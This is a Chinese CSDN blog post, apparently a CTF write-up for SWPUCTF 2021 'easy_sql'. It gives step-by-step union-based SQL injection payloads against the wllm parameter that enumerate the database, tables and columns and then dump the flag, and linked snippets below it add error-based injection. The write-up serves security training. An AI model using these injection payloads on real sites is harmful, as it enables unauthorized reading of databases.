[SWPUCTF 2021 新生赛]easy_sql

最新推荐文章于 2025-04-27 12:28:49 发布

怀慈药王

最新推荐文章于 2025-04-27 12:28:49 发布

阅读量750

点赞数 8

文章标签： sql 数据库

本文链接：https://blog.csdn.net/2301_80470992/article/details/135829030

版权

先查看源码

发现参数是wllm

先输入1试试

接着判断字段数

?wllm=1'order by 3 --+

再试试4

发现4不可以，所以字段数为3

爆出显示点

/?wllm=-1 ' union select 1, 2, @@version -- '

获取库名和用户名

?wllm=-1'union select 1,database(),version()--+

可知，当前数据库名为test_db

/?wllm=-1 ' union select 1, 2, user() -- '

显示root@localhost，说明该用户为root超级管理员用户帐户，可以查看数据库信息

爆表

/?wllm=-1 ' union select 1, 2, group_concat(table_name) from information_schema.tables where table_schema='test_db'-- '

爆列

/?wllm=-1 ' union select 1, 2, group_concat(column_name) from information_schema.columns where table_name='test_tb' -- '

发现有flag，可以试试从这里入手

查找flag

/?wllm=-1 ' union select 1,2, group_concat(flag) from test_tb -- '

完成。

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

怀慈药王

关注关注

8
点赞
踩
6

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

[SWPUCTF 2021 新生赛]easy_sql - 联合注入||报错注入||sqlmap

oZuoShen123的博客

10-06

1175

得到：XPATH syntax error: ‘~NSSCTF{82bf2238-f61d-41f1-b103-’最终：flag=NSSCTF{82bf2238-f61d-41f1-b103-848e28154cee}得到：XPATH syntax error: ‘~ test_tb,users ~’得到：Your Login name:xxx　Your Password:yyy。得到：XPATH syntax error: ‘~ id,flag ~’说明无回显，尝试报错注入。表为：test_db。

SWPUCTF 2021 新生赛 easy_sql

JasonJiao66的博客

01-28

595

当传1‘时出现报错，我们知道这是一个字符型注入，那么接下来还是先把句尾注释掉，然后使用order by语句，从1开始试，到4时开始报错，那么我们知道其有三个字段。首先打开题目，照片左上角求我们赶紧写一点东西，网站标题中则提升我们应该去传一个wllm的值，我们先给杰哥传一个1，回显正常。将1改为-1后，使用union selec，用户名与密码的位置出现了我们注入得到的2与3，表明这两个位置我们可用。接着继续加入limit n,1用group_concat()函数连接到一行显示来对库进行查询。

参与评论您还未登录，请先登录后发表或查看评论

[SWPUCTF 2021新生赛]easy_sql

2301_80337881的博客

01-25

324

首先他告诉我们参数是wllm，那我们待会就要使用/?wllm .......的语句。wllm=1,--+发现成功回显，我们就判断表的列数。使用order by语句，先尝试4，再试试3可以得到表的列数是三。这一题其实和之前发的sqli-labs的第一关一模一样。完了就可以得到flag了。爆表名test_tb。

NSSCTF练习记录：[SWPUCTF 2021 新生赛]easy_sql

qq_44396970的博客

07-31

282

3的时候正常回显，4的时候显示Unknown column ‘4’ in ‘order clause’，说明有3列数据。在回显位上，输入database和version查看数据库名和版本。显示出数据库test_db中所有的表名。判断回显位在222处和333处。查看test_tb表中的所有列。查看网页发现参数为wllm。

NSSCTF | [SWPUCTF 2021 新生赛]easy_sql

2302_80946742的博客

05-09

485

因为extractvalue()函数只能返回32个字符，因此我们使用substring()函数解决这个问题：例如substring("abc",1,1)，此语句表示从第一个字符读取一个字符返回，在上面的payload中，我们得到的数据中，从第一个字符起读取30个字符返回。打开题目，提示输入一些东西，很显眼的可以看到网站标题为“参数是wllm”我们已经知道了字段数，直接爆库名（注意最后的空格）已经看到了flag字段，直接查看数据。报错了，可以判断为单引号闭合。可以看到一半的flag，然后爆表名（注意空格）

[SWPUCTF 2021 新生赛]easy_sql的write up

weixin_73049307的博客

10-30

870

看到test_db就是这个数据库，其他数据库都是sql数据库的必要四个数据库，接下来就查看test_db数据库的表有哪些。一眼就看出test_tb这个表很关键，接下来就查看一下这个test_tb表的信息。

【NSSCTF中SWPUCTF 2021新生赛easy_sql】

AuroraMiraitowa的博客

01-30

499

wllm=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_name=‘test_db’–+wllm=-1’ union select 1,2,3–+(将id弄成一个负数的值，使前面的语句失效)然后看看union查询是否有回显位.6.接下来查询flag输入?

[SWPUCTF 2021 新生赛]easy_sql做题过程

heliar的博客

01-27

403

wllm=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='test_db'--+查询表。wllm=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='test_tb'--+查字段。查看得知回显为wllm，试输入?

[SWPUCTF 2021 新生赛]web 解题思路，实操解析，解题软件，解题方法

09-06

在SWPUCTF 2021新生赛的web项目中，参赛者遇到了一系列与SQL注入有关的挑战。SQL注入是一种常见的网络安全攻击方式，攻击者通过在Web表单输入或URL查询字符串中输入恶意的SQL代码，可以对数据库执行未授权的操作。...

springboot不连接数据库启动(原先连接了mysql数据库)

uncofish的博客

04-27

279

配置application.properties。配置H2内存数据库（无需真实数据库）

MySQL索引优化、SQL分析与运行原理 - Java架构师面试实战

南客先生的博客

04-25

774

面试官：马架构，请问您对MySQL的B+树索引有什么理解？马架构：B+树是一种平衡多路查找树，所有的数据节点都存储在叶子节点上。相比于B树，B+树更适合范围查询和排序操作。面试官：那么覆盖索引是什么？马架构：覆盖索引是指查询的数据可以通过索引直接获取，而无需回表读取数据。面试官：如何选择合适的索引？马架构：需要根据查询条件、数据分布和查询频率进行综合评估。面试官：请解释SQL执行计划中的`EXPLAIN`关键字的作用。马架构：`EXPLAIN`可以帮助我们分析SQL的执行过程，包括使用的索引、扫描行数等信息

PostgreSQL的扩展 pgcrypto

文牧之的博客

04-27

416

pgcrypto 是 PostgreSQL 提供的加密扩展，包含各种加密函数、哈希函数和随机数生成器，是数据库级加密的重要工具。

【Python数据库编程实战】从SQL到ORM的完整指南

赶紧的博客

04-25

916

本文通过7个核心案例，全面解析Python操作主流数据库的技术方案，涵盖SQLite、MySQL、PostgreSQL及ORM框架，提供生产级代码示例与性能优化建议。

SQL面试之--明明建了索引为什么失效了？